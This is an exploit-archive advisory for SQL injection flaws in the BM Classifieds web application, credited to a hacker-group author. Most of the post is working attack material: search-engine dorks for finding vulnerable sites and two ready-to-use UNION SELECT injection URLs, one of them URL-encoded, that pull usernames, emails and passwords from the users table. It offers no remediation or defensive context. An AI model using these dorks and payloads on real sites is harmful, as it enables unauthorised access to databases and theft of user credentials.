BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities
# Published : 2008-03-09
# Author : xcorpitx
# Previous Title : QuickTicket <= 1.5 (qti_usr.php id) SQL Injection Vulnerability
# Next Title : Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#Powered by BM Classifieds (listingid),(ad)SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################

########################################################################
#
#  Dork 1 : ''showad.php?listingid=''
#
#  Dork 2 : ''pfriendly.php?ad=''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
#
#
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
#
#
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
#
#
########################################################################

Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin

# www.Syue.com [2008-03-09]